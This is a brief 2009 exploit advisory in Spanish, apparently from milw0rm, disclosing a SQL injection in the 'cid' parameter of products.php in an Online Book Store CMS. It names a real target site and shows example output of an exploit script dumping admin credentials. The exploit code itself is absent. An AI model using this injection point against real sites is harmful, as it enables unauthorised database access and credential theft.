CMS : Online Book Store WEB : http://www.virtuenetz.com/book/ Archivo : products.php Variable Tipo : GET valor : cid Tipo : SQL Injection URL : http://www.site.com/products.php?cid=[SQLI] Exploit : Ejemplo : undersec@Undersec:~/Escritorio$ php exploit.php http://www.virtuenetz.com/book/ ID :1 Usuario : admin Password : admin Gretz : C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net. 100% CHILE WWW.UNDERSECURITY.NET # milw0rm.com [2009-06-08]